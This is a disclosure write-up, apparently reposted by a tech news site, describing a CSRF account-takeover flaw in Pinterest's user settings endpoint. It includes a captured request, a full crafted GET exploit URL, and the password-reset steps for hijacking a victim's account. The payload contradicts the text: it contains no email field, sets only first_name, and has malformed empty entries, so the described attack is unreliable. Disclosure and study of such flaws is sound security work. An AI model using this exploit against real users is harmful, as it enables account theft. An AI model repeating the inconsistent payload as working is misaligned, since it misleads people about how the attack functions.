
How to find the hijacking loophole of arbitrary account in Pinterest

2025-03-29 Update. From: SLTechnology News&Howtos, Network Security


Shulou (Shulou.com) 05/31 Report


The following describes an account hijacking vulnerability in Pinterest, the US photo-sharing social network. The root cause is that a cross-site request forgery (CSRF) attack can change the registered email address and the username of any user, which is enough to take over the account. For a service with 250 million monthly active users this is a serious issue. Pinterest authorised the disclosure in this article, and the accounts mentioned are test accounts only.

Pinterest is a popular photo-sharing social network in the United States, sometimes described as a photo version of Twitter: users save images they find interesting to their boards, and other users can follow them or repin the images.

Cause of vulnerability

While browsing the main site https://www.pinterest.com, I noticed that the CSRF token was carried in the HTTP header X-CSRFToken. To check how the application actually verifies that token, I captured the following request, which changes some of the user's settings, in Burp Suite:

    POST /_ngjs/resource/UserSettingsResource/update/ HTTP/1.1
    Host: www.pinterest.com
    Content-Type: application/x-www-form-urlencoded
    X-CSRFToken: ……..……..

First, I removed the X-CSRFToken header from the POST request above and forwarded it. The response was the error "/resource/UserSettingsResource/update/ didn't finish after 8 seconds", which suggested that the token was being checked on POST requests.

Next, I changed the POST into a GET request, again with the X-CSRFToken header removed, and forwarded it. This time the response was a normal 200 OK.

So the Pinterest server does not validate the CSRF token at all once the POST is converted into a GET. Further testing showed that several other Pinterest endpoints had the same CSRF weakness.

Account hijacking

Because the forged request is a plain GET, all that is needed is a link like the one below, which Burp Suite's "Change request method" option produces directly from the captured POST by moving the form body into the query string. Any cross-site load of this URL by the victim's browser (a clicked link or an image tag pointing at it) sends it with the victim's Pinterest cookies.

https://www.pinterest.com/_ngjs/resource/UserSettingsResource/update/?source_url=%2Fsettings%2F&data=%7B%22options%22%3A%7B%22impressum_url%22%3Anull%2C%22last_name%22%3A%22dummy%22%2C%22custom_gender%22%3Anull%2C%22locale%22%3A%22en-US%22%2C%22has_password%22%3Atrue%2C%22email_settings%22%3A%22Everything+%28except+emails+you%27ve+turned+off%29%22%2C%22news_settings%22%3A%22Activity+from+other+people+on+Pinterest%22%2C%22id%22%3A%22%22%2C%22is_write_banned%22%3Afalse%2C%22first_name%22%3A%22dummyuser%22%2C%22push_settings%22%3A%22Everything+%28except+push+you%27ve+turned+off%29%22%2C%22personalize_from_offsite_browsing%22%3Atrue%2C%22facebook_timeline_enabled%22%3Afalse%2C%22email_changing_to%22%3Anull%2C%22personalize_nux_from_offsite_browsing%22%3Afalse%2C%22is_tastemaker%22%3Afalse%2C%22type%22%3A%22user_settings%22%2C%22%22%2C%22website_url%22%3A%22%22%2C%22location%22%3A%22%22%2C%22%22%2C%22pfy_preference%22%3Atrue%2C%22facebook_publish_stream_enabled%22%3Afalse%2C%22email_bounced%22%3Afalse%2C%22is_partner%22%3Anull%2C%22ads_customize_from_conversion%22%3Atrue%2C%22additional_website_urls%22%3A%5B%5D%2C%22about%22%3A%22test%22%2C%22gender%22%3A%22male%22%2C%22age%22%3Anull%2C%22exclude_from_search%22%3Afalse%2C%22birthdate%22%3Anull%2C%22show_impressum%22%3Afalse%2C%22email_biz_settings%22%3A%22Everything+%28includes+announcements%2C+expert+tips%2C+creative+ideas%2C+and+more%29%22%2C%22country%22%3A%22IN%22%2C%22hide_from_news%22%3Afalse%2C%22collaborative_boards%22%3A%5B%5D%7D%2C%22context%22%3A%7B%7D%7D

Any logged-in Pinterest user who opens this link has their username and registered email address changed to dummyuser and anytestemail@user.com respectively, where anytestemail@user.com is a mailbox I control.

With the email address changed, I went to the Pinterest password reset page:

https://www.pinterest.com/password/reset/

I requested a reset for the account, opened the anytestemail@user.com mailbox I control, followed the reset link Pinterest sent there, set a new password, and logged in to the victim's account with the username dummyuser and the new password: a complete hijack.
